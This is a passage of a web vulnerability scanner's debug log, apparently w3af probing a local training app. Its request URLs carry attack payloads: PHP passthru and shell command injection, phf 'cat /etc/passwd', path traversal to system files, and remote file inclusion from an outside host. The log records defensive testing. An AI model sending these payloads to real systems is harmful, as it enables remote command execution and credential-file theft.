(id=23569,from_cache=0,grep=1,rtt=0.11,did=AP5POAfb) [Wed Feb 12 10:04:30 2020 - debug] HEAD http://localhost:9090/level/83/exec/show returned HTTP code "404" (id=23572,from_cache=0,grep=1,rtt=0.07,did=fdNLbb8P) [Wed Feb 12 10:04:30 2020 - debug] HEAD http://localhost:9090/beta/ returned HTTP code "404" (id=23573,from_cache=0,grep=1,rtt=0.12,did=c4D9yKD0) [Wed Feb 12 10:04:30 2020 - debug] POST http://localhost:9090/_vti_bin/_vti_aut/author.exe?method=list documents:3.0.2.1706&service_name=&listHiddenDocs=true&listExplorerDocs=true&listRecurse=false&listFiles=true&listFolders=true&listLinkInfo=true&listIncludeParent=true&listDerivedT=false&listBorders=false returned HTTP code "404" (id=23574,from_cache=0,grep=1,rtt=0.22,did=S5zkLwQN) [Wed Feb 12 10:04:30 2020 - debug] HEAD http://localhost:9090/_vti_pvt/linkinfo.cnf returned HTTP code "404" (id=23571,from_cache=0,grep=1,rtt=0.06,did=YuHoElFe) [Wed Feb 12 10:04:30 2020 - debug] HEAD http://localhost:9090/level/16/exec/show returned HTTP code "404" (id=23577,from_cache=0,grep=1,rtt=0.06,did=4wlE1vWf) [Wed Feb 12 10:04:30 2020 - debug] CachedQueue.put() will write a 'ExceptionData' item to the GrepOut DiskDict. This uses more CPU and disk IO than storing in memory but will avoid high memory usage issues. The current GrepOut DiskDict size is 2209. [Wed Feb 12 10:04:30 2020 - debug] GET http://localhost:9090/Search returned HTTP code "404" (id=23579,from_cache=0,grep=1,rtt=0.11,did=9O08ELsh) [Wed Feb 12 10:04:30 2020 - debug] GET http://localhost:9090/postnuke/index.php?name=Forums&file=viewtopic&t=2&rush=dir&highlight=%27.passthru($HTTP_GET_VARS[rush]).%27 returned HTTP code "404" (id=23576,from_cache=0,grep=1,rtt=0.08,did=3NI74mIM) [Wed Feb 12 10:04:30 2020 - debug] HEAD http://localhost:9090/cgi-bin/gbadmin.cgi?action=change_automail returned HTTP code "404" (id=23581,from_cache=0,grep=1,rtt=0.18,did=nW8IM5of) [Wed Feb 12 10:04:30 2020 - debug] Grep consumer should_grep() stats: {'reject-seen-body': 12175, 'reject-seen-url': 5629, 'reject-out-of-scope': 216, 'accept': 4930} [Wed Feb 12 10:04:30 2020 - debug] CachedQueue.put() will write a 'ExceptionData' item to the GrepOut DiskDict. This uses more CPU and disk IO than storing in memory but will avoid high memory usage issues. The current GrepOut DiskDict size is 2210. [Wed Feb 12 10:04:30 2020 - debug] HEAD http://localhost:9090/level/65/exec/show returned HTTP code "404" (id=23582,from_cache=0,grep=1,rtt=0.21,did=uE5IYJ4s) [Wed Feb 12 10:04:30 2020 - debug] HEAD http://localhost:9090/level/93/exec/show returned HTTP code "404" (id=23583,from_cache=0,grep=1,rtt=0.14,did=pYOta5B7) [Wed Feb 12 10:04:30 2020 - debug] HEAD http://localhost:9090/cgi-bin/bsguest.cgi?email=x&ls= returned HTTP code "404" (id=23584,from_cache=0,grep=1,rtt=0.19,did=V1VSrKQE) [Wed Feb 12 10:04:30 2020 - debug] HEAD http://localhost:9090/cgi-bin/realsignup.cgi returned HTTP code "404" (id=23580,from_cache=0,grep=1,rtt=0.21,did=u42RTWZp) [Wed Feb 12 10:04:30 2020 - debug] CachedQueue.get() from GrepIn DiskDict was used to read an item from disk. The current GrepIn DiskDict size is 4524. [Wed Feb 12 10:04:30 2020 - debug] GET http://localhost:9090/phpnuke/html/.php?name=Network_Tools&file=index&func=ping_host&hinput=;id returned HTTP code "404" (id=23578,from_cache=0,grep=1,rtt=0.09,did=xVmORCuZ) [Wed Feb 12 10:04:30 2020 - debug] GET http://localhost:9090/cgi-bin/dose.pl?daily=&somefile.txt=&|ls|= returned HTTP code "404" (id=23585,from_cache=0,grep=1,rtt=0.04,did=mFa6VgQY) [Wed Feb 12 10:04:30 2020 - debug] HEAD http://localhost:9090/level/45/exec/show returned HTTP code "404" (id=23586,from_cache=0,grep=1,rtt=0.09,did=Kj7eXPnS) [Wed Feb 12 10:04:30 2020 - debug] HEAD http://localhost:9090/cgi-bin/countedit returned HTTP code "404" (id=23587,from_cache=0,grep=1,rtt=0.11,did=oRtzEg8a) [Wed Feb 12 10:04:30 2020 - debug] HEAD http://localhost:9090/cfdocs/exampleapp/publish/admin/addcontent.cfm returned HTTP code "404" (id=23588,from_cache=0,grep=1,rtt=0.10,did=x1ktOW2v) [Wed Feb 12 10:04:30 2020 - debug] CachedQueue.put() will write a 'ExceptionData' item to the GrepOut DiskDict. This uses more CPU and disk IO than storing in memory but will avoid high memory usage issues. The current GrepOut DiskDict size is 2211. [Wed Feb 12 10:04:30 2020 - debug] CachedQueue.put() will write a 'int' item to the GrepIn DiskDict. This uses more CPU and disk IO than storing in memory but will avoid high memory usage issues. The current GrepIn DiskDict size is 4524. [Wed Feb 12 10:04:30 2020 - debug] HEAD http://localhost:9090/level/56/exec/show returned HTTP code "404" (id=23591,from_cache=0,grep=1,rtt=0.05,did=HraqdpGt) [Wed Feb 12 10:04:30 2020 - debug] GET http://localhost:9090/postnuke/html/index.php?name=forums&file=viewtopic&t=2&rush=ls -al&highlight=%27.passthru($HTTP_GET_VARS[rush]).%27 returned HTTP code "404" (id=23590,from_cache=0,grep=1,rtt=0.19,did=CWnu1Qu5) [Wed Feb 12 10:04:30 2020 - debug] HEAD http://localhost:9090/admin.php3 returned HTTP code "404" (id=23592,from_cache=0,grep=1,rtt=0.17,did=tmwMjIFB) [Wed Feb 12 10:04:30 2020 - debug] GET http://localhost:9090/viewtopic.php?t=2&rush=ls -al&highlight=%27.passthru($HTTP_GET_VARS[rush]).%27 returned HTTP code "404" (id=23594,from_cache=0,grep=1,rtt=0.11,did=KAZSrblf) [Wed Feb 12 10:04:30 2020 - debug] HEAD http://localhost:9090/cgi-bin/nph-publish.cgi returned HTTP code "404" (id=23595,from_cache=0,grep=1,rtt=0.11,did=JhURaGM4) [Wed Feb 12 10:04:30 2020 - debug] GET http://localhost:9090/credit/ returned HTTP code "404" (id=23597,from_cache=0,grep=1,rtt=0.14,did=AQVbweoq) [Wed Feb 12 10:04:30 2020 - debug] HEAD http://localhost:9090/Agentes/ returned HTTP code "404" (id=23598,from_cache=0,grep=1,rtt=0.03,did=zWvvZD6e) [Wed Feb 12 10:04:30 2020 - debug] GET http://localhost:9090/gallery/errors/reconfigure.php?GALLERY_BASEDIR=http://cirt.net/rfiinc.txt returned HTTP code "404" (id=23589,from_cache=0,grep=1,rtt=0.16,did=U3prrBTD) [Wed Feb 12 10:04:30 2020 - debug] HEAD http://localhost:9090/compra/ returned HTTP code "404" (id=23593,from_cache=0,grep=1,rtt=0.13,did=JNdLH3iN) [Wed Feb 12 10:04:30 2020 - debug] HEAD http://localhost:9090/access/ returned HTTP code "404" (id=23599,from_cache=0,grep=1,rtt=0.08,did=o6VOSYOD) [Wed Feb 12 10:04:30 2020 - debug] GET http://localhost:9090/ returned HTTP code "302" (id=23600,from_cache=0,grep=1,rtt=0.05,did=iSp2eHus) [Wed Feb 12 10:04:30 2020 - debug] symfony.grep(uri="http://localhost:9090/2006/") took 0.00s to run [Wed Feb 12 10:04:30 2020 - debug] HEAD http://localhost:9090/archivar/ returned HTTP code "404" (id=23596,from_cache=0,grep=1,rtt=0.11,did=kSUqNdKt) [Wed Feb 12 10:04:30 2020 - debug] motw.grep(uri="http://localhost:9090/2006/") took 0.00s to run [Wed Feb 12 10:04:30 2020 - debug] file_upload.grep(uri="http://localhost:9090/2006/") took 0.00s to run [Wed Feb 12 10:04:30 2020 - debug] expect_ct.grep(uri="http://localhost:9090/2006/") took 0.00s to run [Wed Feb 12 10:04:30 2020 - debug] private_ip.grep(uri="http://localhost:9090/2006/") took 0.00s to run [Wed Feb 12 10:04:30 2020 - debug] xss_protection_header.grep(uri="http://localhost:9090/2006/") took 0.00s to run [Wed Feb 12 10:04:30 2020 - debug] svn_users.grep(uri="http://localhost:9090/2006/") took 0.00s to run [Wed Feb 12 10:04:30 2020 - debug] cross_domain_js.grep(uri="http://localhost:9090/2006/") took 0.00s to run [Wed Feb 12 10:04:30 2020 - debug] wsdl_greper.grep(uri="http://localhost:9090/2006/") took 0.00s to run [Wed Feb 12 10:04:30 2020 - debug] CachedQueue.put() will write a 'int' item to the GrepIn DiskDict. This uses more CPU and disk IO than storing in memory but will avoid high memory usage issues. The current GrepIn DiskDict size is 4525. [Wed Feb 12 10:04:30 2020 - debug] detailed.has_active_session() and detailed.login() [Wed Feb 12 10:04:30 2020 - debug] [auth.detailed] Checking if session for user admin is active (did: IND4LAhO) [Wed Feb 12 10:04:30 2020 - debug] CachedQueue.put() will write a 'int' item to the GrepIn DiskDict. This uses more CPU and disk IO than storing in memory but will avoid high memory usage issues. The current GrepIn DiskDict size is 4526. [Wed Feb 12 10:04:30 2020 - debug] meta_generator.grep(uri="http://localhost:9090/2006/") took 0.00s to run [Wed Feb 12 10:04:30 2020 - debug] retirejs.grep(uri="http://localhost:9090/2006/") took 0.00s to run [Wed Feb 12 10:04:30 2020 - debug] code_disclosure.grep(uri="http://localhost:9090/2006/") took 0.00s to run [Wed Feb 12 10:04:30 2020 - debug] Unknown post-data. Content-type: "None" and/or post-data "" [Wed Feb 12 10:04:30 2020 - debug] serialized_object.grep(uri="http://localhost:9090/2006/") took 0.00s to run [Wed Feb 12 10:04:30 2020 - debug] blank_body.grep(uri="http://localhost:9090/2006/") took 0.00s to run [Wed Feb 12 10:04:30 2020 - debug] path_disclosure.grep(uri="http://localhost:9090/2006/") took 0.00s to run [Wed Feb 12 10:04:30 2020 - debug] strange_http_codes.grep(uri="http://localhost:9090/2006/") took 0.00s to run [Wed Feb 12 10:04:30 2020 - debug] credit_cards.grep(uri="http://localhost:9090/2006/") took 0.00s to run [Wed Feb 12 10:04:30 2020 - debug] websockets_links.grep(uri="http://localhost:9090/2006/") took 0.00s to run [Wed Feb 12 10:04:30 2020 - debug] csp.grep(uri="http://localhost:9090/2006/") took 0.00s to run [Wed Feb 12 10:04:30 2020 - debug] dom_xss.grep(uri="http://localhost:9090/2006/") took 0.00s to run [Wed Feb 12 10:04:30 2020 - debug] vulners_db.grep(uri="http://localhost:9090/2006/") took 0.00s to run [Wed Feb 12 10:04:30 2020 - debug] strict_transport_security.grep(uri="http://localhost:9090/2006/") took 0.00s to run [Wed Feb 12 10:04:30 2020 - debug] dot_net_event_validation.grep(uri="http://localhost:9090/2006/") took 0.00s to run [Wed Feb 12 10:04:30 2020 - debug] objects.grep(uri="http://localhost:9090/2006/") took 0.00s to run [Wed Feb 12 10:04:30 2020 - debug] error_500.grep(uri="http://localhost:9090/2006/") took 0.00s to run [Wed Feb 12 10:04:30 2020 - debug] meta_tags.grep(uri="http://localhost:9090/2006/") took 0.00s to run [Wed Feb 12 10:04:30 2020 - debug] password_profiling.grep(uri="http://localhost:9090/2006/") took 0.00s to run [Wed Feb 12 10:04:30 2020 - debug] click_jacking.grep(uri="http://localhost:9090/2006/") took 0.00s to run [Wed Feb 12 10:04:30 2020 - debug] directory_indexing.grep(uri="http://localhost:9090/2006/") took 0.00s to run [Wed Feb 12 10:04:30 2020 - debug] CachedQueue.put() will write a 'int' item to the GrepIn DiskDict. This uses more CPU and disk IO than storing in memory but will avoid high memory usage issues. The current GrepIn DiskDict size is 4527. [Wed Feb 12 10:04:30 2020 - debug] keys.grep(uri="http://localhost:9090/2006/") took 0.00s to run [Wed Feb 12 10:04:30 2020 - debug] lang.grep(uri="http://localhost:9090/2006/") took 0.00s to run [Wed Feb 12 10:04:30 2020 - debug] clamav.grep(uri="http://localhost:9090/2006/") took 0.00s to run [Wed Feb 12 10:04:30 2020 - debug] hash_analysis.grep(uri="http://localhost:9090/2006/") took 0.00s to run [Wed Feb 12 10:04:30 2020 - debug] GET http://localhost:9090/index.php?name=PNphpBB2&file=viewtopic&t=2&rush=ls -al&highlight=%27.passthru($HTTP_GET_VARS[rush]).%27 returned HTTP code "404" (id=23601,from_cache=0,grep=1,rtt=0.18,did=G727CHs5) [Wed Feb 12 10:04:30 2020 - debug] Grep consumer should_grep() stats: {'reject-seen-body': 12194, 'reject-seen-url': 5632, 'reject-out-of-scope': 216, 'accept': 4933} [Wed Feb 12 10:04:30 2020 - debug] HEAD http://localhost:9090/cpanel/ returned HTTP code "404" (id=23604,from_cache=0,grep=1,rtt=0.11,did=vECmcvE4) [Wed Feb 12 10:04:30 2020 - debug] GET http://localhost:9090/phpBB/index.php?name=forums&file=viewtopic&t=2&rush=dir&highlight=%27.passthru($HTTP_GET_VARS[rush]).%27 returned HTTP code "404" (id=23602,from_cache=0,grep=1,rtt=0.19,did=FeIyM5vN) [Wed Feb 12 10:04:30 2020 - debug] localhost:9090 connection pool stats (free:168 / in_use:8 / max:50 / total:176) [Wed Feb 12 10:04:30 2020 - debug] Connections with more in use time: (fa99a017016708ef, 0.11 sec) (4ee15c9b6aa66021, 0.09 sec) (39f162a2b0bc59d3, 0.08 sec) (909f78bc2ef2d73b, 0.08 sec) (50b28aedc931ed25, 0.07 sec) [Wed Feb 12 10:04:30 2020 - debug] GET http://localhost:9090/jsp/jspsamp/jspexamples/viewsource.jsp?source=/../../../../../../../../../boot.ini returned HTTP code "404" (id=23603,from_cache=0,grep=1,rtt=0.12,did=RaOimrV0) [Wed Feb 12 10:04:30 2020 - debug] CachedQueue.put() will write a 'int' item to the GrepIn DiskDict. This uses more CPU and disk IO than storing in memory but will avoid high memory usage issues. The current GrepIn DiskDict size is 4528. [Wed Feb 12 10:04:30 2020 - debug] strange_reason.grep(uri="http://localhost:9090/2006/") took 0.00s to run [Wed Feb 12 10:04:30 2020 - debug] content_sniffing.grep(uri="http://localhost:9090/2006/") took 0.00s to run [Wed Feb 12 10:04:30 2020 - debug] user_defined_regex.grep(uri="http://localhost:9090/2006/") took 0.00s to run [Wed Feb 12 10:04:30 2020 - debug] cache_control.grep(uri="http://localhost:9090/2006/") took 0.00s to run [Wed Feb 12 10:04:30 2020 - debug] strange_headers.grep(uri="http://localhost:9090/2006/") took 0.00s to run [Wed Feb 12 10:04:30 2020 - debug] ssn.grep(uri="http://localhost:9090/2006/") took 0.00s to run [Wed Feb 12 10:04:30 2020 - debug] oracle.grep(uri="http://localhost:9090/2006/") took 0.00s to run [Wed Feb 12 10:04:30 2020 - debug] error_pages.grep(uri="http://localhost:9090/2006/") took 0.02s to run [Wed Feb 12 10:04:30 2020 - debug] feeds.grep(uri="http://localhost:9090/2006/") took 0.00s to run [Wed Feb 12 10:04:30 2020 - debug] url_session.grep(uri="http://localhost:9090/2006/") took 0.04s to run [Wed Feb 12 10:04:30 2020 - debug] CachedQueue.put() will write a 'int' item to the GrepIn DiskDict. This uses more CPU and disk IO than storing in memory but will avoid high memory usage issues. The current GrepIn DiskDict size is 4529. [Wed Feb 12 10:04:30 2020 - debug] analyze_cookies.grep(uri="http://localhost:9090/2006/") took 0.00s to run [Wed Feb 12 10:04:30 2020 - debug] CachedQueue.put() will write a 'int' item to the GrepIn DiskDict. This uses more CPU and disk IO than storing in memory but will avoid high memory usage issues. The current GrepIn DiskDict size is 4530. [Wed Feb 12 10:04:30 2020 - debug] HEAD http://localhost:9090/DMR/ returned HTTP code "404" (id=23605,from_cache=0,grep=1,rtt=0.10,did=3KX7D6Bk) [Wed Feb 12 10:04:30 2020 - debug] HEAD http://localhost:9090/backdoor/ returned HTTP code "404" (id=23607,from_cache=0,grep=1,rtt=0.10,did=o12JiF7P) [Wed Feb 12 10:04:30 2020 - debug] HEAD http://localhost:9090/enviamail/ returned HTTP code "404" (id=23609,from_cache=0,grep=1,rtt=0.10,did=YvBpRzBU) [Wed Feb 12 10:04:30 2020 - debug] GET http://localhost:9090/servlet/allaire.jrun.ssi.SSIFilter returned HTTP code "404" (id=23611,from_cache=0,grep=1,rtt=0.14,did=9rQQPxok) [Wed Feb 12 10:04:30 2020 - debug] GET http://localhost:9090/cgi-bin/ returned HTTP code "404" (id=23612,from_cache=0,grep=1,rtt=0.18,did=k1cFGeg6) [Wed Feb 12 10:04:30 2020 - debug] HEAD http://localhost:9090/admin.shtml returned HTTP code "404" (id=23615,from_cache=0,grep=1,rtt=0.09,did=q0xemnHV) [Wed Feb 12 10:04:30 2020 - debug] HEAD http://localhost:9090/musicqueue.cgi returned HTTP code "404" (id=23618,from_cache=0,grep=1,rtt=0.10,did=I68x4AZc) [Wed Feb 12 10:04:30 2020 - debug] GET http://localhost:9090/bugs/index.php?err=3&email=\\"> returned HTTP code "404" (id=23619,from_cache=0,grep=1,rtt=0.13,did=7PBm42SV) [Wed Feb 12 10:04:30 2020 - debug] GET http://localhost:9090/ returned HTTP code "302" (id=23608,from_cache=0,grep=1,rtt=0.11,did=IlGgvbDE) [Wed Feb 12 10:04:30 2020 - debug] HEAD http://localhost:9090/level/84/exec/show returned HTTP code "404" (id=23610,from_cache=0,grep=1,rtt=0.08,did=zJ14QrMB) [Wed Feb 12 10:04:30 2020 - debug] GET http://localhost:9090/postnuke/html/index.php?name=Forums&file=viewtopic&t=2&rush=dir&highlight=%27.passthru($HTTP_GET_VARS[rush]).%27 returned HTTP code "404" (id=23613,from_cache=0,grep=1,rtt=0.12,did=JItOGd4u) [Wed Feb 12 10:04:30 2020 - debug] Still have 1 unfinished tasks in CrawlInfraIn join() [Wed Feb 12 10:04:30 2020 - debug] HEAD http://localhost:9090/level/75/exec/show returned HTTP code "404" (id=23614,from_cache=0,grep=1,rtt=0.10,did=PPwsvcOn) [Wed Feb 12 10:04:30 2020 - debug] GET http://localhost:9090/SPHERA/login/sm_login_screen.php?uid=\\"> returned HTTP code "404" (id=23617,from_cache=0,grep=1,rtt=0.08,did=S3j2Y81j) [Wed Feb 12 10:04:30 2020 - debug] GET http://localhost:9090/showmail.pl?Folder= returned HTTP code "404" (id=23606,from_cache=0,grep=1,rtt=0.05,did=xLEwBCWn) [Wed Feb 12 10:04:30 2020 - debug] HEAD http://localhost:9090/bin/ returned HTTP code "404" (id=23616,from_cache=0,grep=1,rtt=0.12,did=eyl7fo2U) [Wed Feb 12 10:04:30 2020 - debug] GET http://localhost:9090/modules/index.php?name=forums&file=viewtopic&t=2&rush=ls -al&highlight=%27.passthru($HTTP_GET_VARS[rush]).%27 returned HTTP code "404" (id=23620,from_cache=0,grep=1,rtt=0.06,did=juug91VI) [Wed Feb 12 10:04:30 2020 - debug] CachedQueue.put() will write a 'ExceptionData' item to the GrepOut DiskDict. This uses more CPU and disk IO than storing in memory but will avoid high memory usage issues. The current GrepOut DiskDict size is 2212. [Wed Feb 12 10:04:30 2020 - debug] GET http://localhost:9090/etc/ returned HTTP code "404" (id=23621,from_cache=0,grep=1,rtt=0.21,did=HMwzkXfZ) [Wed Feb 12 10:04:30 2020 - debug] HEAD http://localhost:9090/cgi-bin/scgiwrap returned HTTP code "404" (id=23622,from_cache=0,grep=1,rtt=0.02,did=4tHg57lw) [Wed Feb 12 10:04:30 2020 - debug] HEAD http://localhost:9090/crypto/ returned HTTP code "404" (id=23625,from_cache=0,grep=1,rtt=0.13,did=m1jimTqq) [Wed Feb 12 10:04:30 2020 - debug] CachedQueue.get() from GrepIn DiskDict was used to read an item from disk. The current GrepIn DiskDict size is 4530. [Wed Feb 12 10:04:30 2020 - debug] localhost:9090 connection pool stats (free:169 / in_use:11 / max:50 / total:180) [Wed Feb 12 10:04:30 2020 - debug] Connections with more in use time: (53e105d195a141c9, 0.11 sec) (7d7a9b0975535150, 0.09 sec) (0546f1329ef05cbf, 0.05 sec) (a558d5c3a36d52b6, 0.04 sec) (155b0c18b9ccb8f2, 0.01 sec) [Wed Feb 12 10:04:30 2020 - debug] HEAD http://localhost:9090/cash/ returned HTTP code "404" (id=23623,from_cache=0,grep=1,rtt=0.17,did=YKWHpiMG) [Wed Feb 12 10:04:30 2020 - debug] CachedQueue.put() will write a 'ExceptionData' item to the GrepOut DiskDict. This uses more CPU and disk IO than storing in memory but will avoid high memory usage issues. The current GrepOut DiskDict size is 2213. [Wed Feb 12 10:04:30 2020 - debug] HEAD http://localhost:9090/cgi-bin/gbadmin.cgi?action=colors returned HTTP code "404" (id=23624,from_cache=0,grep=1,rtt=0.05,did=BuZ1Rb6B) [Wed Feb 12 10:04:30 2020 - debug] HEAD http://localhost:9090/cgi-bin/nph-test-cgi returned HTTP code "404" (id=23626,from_cache=0,grep=1,rtt=0.18,did=xyLwK9Xk) [Wed Feb 12 10:04:30 2020 - debug] GET http://localhost:9090/cgi-bin/nbmember.cgi?cmd=list_all_users returned HTTP code "404" (id=23627,from_cache=0,grep=1,rtt=0.26,did=CpXc9SpR) [Wed Feb 12 10:04:30 2020 - debug] HEAD http://localhost:9090/guestbook/ returned HTTP code "404" (id=23629,from_cache=0,grep=1,rtt=0.16,did=BFkYhWUf) [Wed Feb 12 10:04:30 2020 - debug] HEAD http://localhost:9090/agentes/ returned HTTP code "404" (id=23630,from_cache=0,grep=1,rtt=0.21,did=js2vSNbJ) [Wed Feb 12 10:04:30 2020 - debug] Grep consumer should_grep() stats: {'reject-seen-body': 12211, 'reject-seen-url': 5640, 'reject-out-of-scope': 216, 'accept': 4933} [Wed Feb 12 10:04:30 2020 - debug] CachedQueue.put() will write a 'ExceptionData' item to the GrepOut DiskDict. This uses more CPU and disk IO than storing in memory but will avoid high memory usage issues. The current GrepOut DiskDict size is 2214. [Wed Feb 12 10:04:30 2020 - debug] HEAD http://localhost:9090/compras/ returned HTTP code "404" (id=23628,from_cache=0,grep=1,rtt=0.17,did=zVnqDSoA) [Wed Feb 12 10:04:30 2020 - debug] CachedQueue.put() will write a 'ExceptionData' item to the GrepOut DiskDict. This uses more CPU and disk IO than storing in memory but will avoid high memory usage issues. The current GrepOut DiskDict size is 2215. [Wed Feb 12 10:04:30 2020 - debug] GET http://localhost:9090/index.php?name=Forums&file=viewtopic&t=2&rush=ls -al&highlight=%27.passthru($HTTP_GET_VARS[rush]).%27 returned HTTP code "404" (id=23631,from_cache=0,grep=1,rtt=0.07,did=avbGOwsH) [Wed Feb 12 10:04:30 2020 - debug] HEAD http://localhost:9090/level/94/exec/show returned HTTP code "404" (id=23632,from_cache=0,grep=1,rtt=0.08,did=qtfzRLmy) [Wed Feb 12 10:04:30 2020 - debug] HEAD http://localhost:9090/datos/ returned HTTP code "404" (id=23633,from_cache=0,grep=1,rtt=0.02,did=lfRwsiwK) [Wed Feb 12 10:04:30 2020 - debug] GET http://localhost:9090/ returned HTTP code "302" (id=23636,from_cache=0,grep=1,rtt=0.14,did=k02zySNF) [Wed Feb 12 10:04:30 2020 - debug] CachedQueue.put() will write a 'ExceptionData' item to the GrepOut DiskDict. This uses more CPU and disk IO than storing in memory but will avoid high memory usage issues. The current GrepOut DiskDict size is 2216. [Wed Feb 12 10:04:30 2020 - debug] CachedQueue.put() will write a 'int' item to the GrepIn DiskDict. This uses more CPU and disk IO than storing in memory but will avoid high memory usage issues. The current GrepIn DiskDict size is 4530. [Wed Feb 12 10:04:30 2020 - debug] HEAD http://localhost:9090/cfdocs/exampleapp/publish/admin/application.cfm returned HTTP code "404" (id=23635,from_cache=0,grep=1,rtt=0.19,did=Vjc0mHsU) [Wed Feb 12 10:04:30 2020 - debug] HEAD http://localhost:9090/level/46/exec/show returned HTTP code "404" (id=23634,from_cache=0,grep=1,rtt=0.11,did=D9Sv7kT9) [Wed Feb 12 10:04:30 2020 - debug] CachedQueue.put() will write a 'ExceptionData' item to the GrepOut DiskDict. This uses more CPU and disk IO than storing in memory but will avoid high memory usage issues. The current GrepOut DiskDict size is 2217. [Wed Feb 12 10:04:30 2020 - debug] symfony.grep(uri="http://localhost:9090/40/") took 0.00s to run [Wed Feb 12 10:04:30 2020 - debug] motw.grep(uri="http://localhost:9090/40/") took 0.00s to run [Wed Feb 12 10:04:30 2020 - debug] meta_generator.grep(uri="http://localhost:9090/40/") took 0.00s to run [Wed Feb 12 10:04:30 2020 - debug] xss_protection_header.grep(uri="http://localhost:9090/40/") took 0.00s to run [Wed Feb 12 10:04:30 2020 - debug] private_ip.grep(uri="http://localhost:9090/40/") took 0.00s to run [Wed Feb 12 10:04:30 2020 - debug] svn_users.grep(uri="http://localhost:9090/40/") took 0.00s to run [Wed Feb 12 10:04:30 2020 - debug] CachedQueue.put() will write a 'ExceptionData' item to the GrepOut DiskDict. This uses more CPU and disk IO than storing in memory but will avoid high memory usage issues. The current GrepOut DiskDict size is 2218. [Wed Feb 12 10:04:30 2020 - debug] HEAD http://localhost:9090/level/66/exec/show returned HTTP code "404" (id=23638,from_cache=0,grep=1,rtt=0.08,did=pg66HqPG) [Wed Feb 12 10:04:30 2020 - debug] HEAD http://localhost:9090/cgi-bin/domainredirect.cgi returned HTTP code "404" (id=23639,from_cache=0,grep=1,rtt=0.16,did=tBYTDqUS) [Wed Feb 12 10:04:30 2020 - debug] wsdl_greper.grep(uri="http://localhost:9090/40/") took 0.00s to run [Wed Feb 12 10:04:30 2020 - debug] file_upload.grep(uri="http://localhost:9090/40/") took 0.00s to run [Wed Feb 12 10:04:30 2020 - debug] expect_ct.grep(uri="http://localhost:9090/40/") took 0.00s to run [Wed Feb 12 10:04:30 2020 - debug] cross_domain_js.grep(uri="http://localhost:9090/40/") took 0.00s to run [Wed Feb 12 10:04:30 2020 - debug] HEAD http://localhost:9090/archive/ returned HTTP code "404" (id=23643,from_cache=0,grep=1,rtt=0.17,did=Xvw0UjfY) [Wed Feb 12 10:04:30 2020 - debug] GET http://localhost:9090/webserver.ini returned HTTP code "404" (id=23644,from_cache=0,grep=1,rtt=0.13,did=ErJZ8P8Q) [Wed Feb 12 10:04:30 2020 - debug] GET http://localhost:9090/gallery/errors/unconfigured.php?GALLERY_BASEDIR=http://cirt.net/rfiinc.txt returned HTTP code "404" (id=23645,from_cache=0,grep=1,rtt=0.12,did=y14Ypjso) [Wed Feb 12 10:04:30 2020 - debug] GET http://localhost:9090/learn/vulnerability/a1_injection returned HTTP code "200" (id=23647,from_cache=0,grep=0,rtt=0.06,did=IND4LAhO) [Wed Feb 12 10:04:30 2020 - debug] [auth.detailed] User "admin" is currently logged into the application (did: IND4LAhO) [Wed Feb 12 10:04:30 2020 - debug] detailed._login() took 0.83s to run [Wed Feb 12 10:04:30 2020 - debug] HEAD http://localhost:9090/doc/ returned HTTP code "404" (id=23648,from_cache=0,grep=1,rtt=0.05,did=xFLI3g8c) [Wed Feb 12 10:04:30 2020 - debug] GET http://localhost:9090/jsp/jspsamp/jspexamples/viewsource.jsp?source=/../../../../../../../../../etc/passwd returned HTTP code "404" (id=23649,from_cache=0,grep=1,rtt=0.10,did=8JBdGVkJ) [Wed Feb 12 10:04:30 2020 - debug] GET http://localhost:9090/cgi-bin/phf?Qname=root\ncat /etc/passwd returned HTTP code "404" (id=23651,from_cache=0,grep=1,rtt=0.12,did=xVB78Xsp) [Wed Feb 12 10:04:30 2020 - debug] HEAD http://localhost:9090/error_log returned HTTP code "404" (id=23653,from_cache=0,grep=1,rtt=0.06,did=qUROsl3m) [Wed Feb 12 10:04:30 2020 - debug] HEAD http://localhost:9090/html/ returned HTTP code "404" (id=23641,from_cache=0,grep=1,rtt=0.17,did=dVKBo9YU) [Wed Feb 12 10:04:30 2020 - debug] HEAD http://localhost:9090/backup/ returned HTTP code "404" (id=23652,from_cache=0,grep=1,rtt=0.02,did=7tW97bgQ) [Wed Feb 12 10:04:30 2020 - debug] retirejs.grep(uri="http://localhost:9090/40/") took 0.00s to run [Wed Feb 12 10:04:30 2020 - debug] code_disclosure.grep(uri="http://localhost:9090/40/") took 0.00s to run [Wed Feb 12 10:04:30 2020 - debug] Unknown post-data. Content-type: "None" and/or post-data "" [Wed Feb 12 10:04:30 2020 - debug] serialized_object.grep(uri="http://localhost:9090/40/") took 0.00s to run [Wed Feb 12 10:04:30 2020 - debug] blank_body.grep(uri="http://localhost:9090/40/") took 0.00s to run [Wed Feb 12 10:04:30 2020 - debug] path_disclosure.grep(uri="http://localhost:9090/40/") took 0.00s to run [Wed Feb 12 10:04:30 2020 - debug] strange_http_codes.grep(uri="http://localhost:9090/40/") took 0.00s to run [Wed Feb 12 10:04:30 2020 - debug] credit_cards.grep(uri="http://localhost:9090/40/") took 0.00s to run [Wed Feb 12 10:04:30 2020 - debug] websockets_links.grep(uri="http://localhost:9090/40/") took 0.00s to run [Wed Feb 12 10:04:30 2020 - debug] csp.grep(uri="http://localhost:9090/40/") took 0.00s to run [Wed Feb 12 10:04:30 2020 - debug] dom_xss.grep(uri="http://localhost:9090/40/") took 0.00s to run [Wed Feb 12 10:04:30 2020 - debug] vulners_db.grep(uri="http://localhost:9090/40/") took 0.00s to run [Wed Feb 12 10:04:30 2020 - debug] strict_transport_security.grep(uri="http://localhost:9090/40/") took 0.00s to run [Wed Feb 12 10:04:30 2020 - debug] keys.grep(uri="http://localhost:9090/40/") took 0.00s to run [Wed Feb 12 10:04:30 2020 - debug] clamav.grep(uri="http://localhost:9090/40/") took 0.00s to run [Wed Feb 12 10:04:30 2020 - debug] dot_net_event_validation.grep(uri="http://localhost:9090/40/") took 0.00s to run [Wed Feb 12 10:04:30 2020 - debug] objects.grep(uri="http://localhost:9090/40/") took 0.00s to run [Wed Feb 12 10:04:30 2020 - debug] error_500.grep(uri="http://localhost:9090/40/") took 0.00s to run [Wed Feb 12 10:04:30 2020 - debug] meta_tags.grep(uri="http://localhost:9090/40/") took 0.00s to run [Wed Feb 12 10:04:30 2020 - debug] password_profiling.grep(uri="http://localhost:9090/40/") took 0.00s to run [Wed Feb 12 10:04:30 2020 - debug] click_jacking.grep(uri="http://localhost:9090/40/") took 0.00s to run [Wed Feb 12 10:04:30 2020 - debug] directory_indexing.grep(uri="http://localhost:9090/40/") took 0.00s to run [Wed Feb 12 10:04:30 2020 - debug] lang.grep(uri="http://localhost:9090/40/") took 0.00s 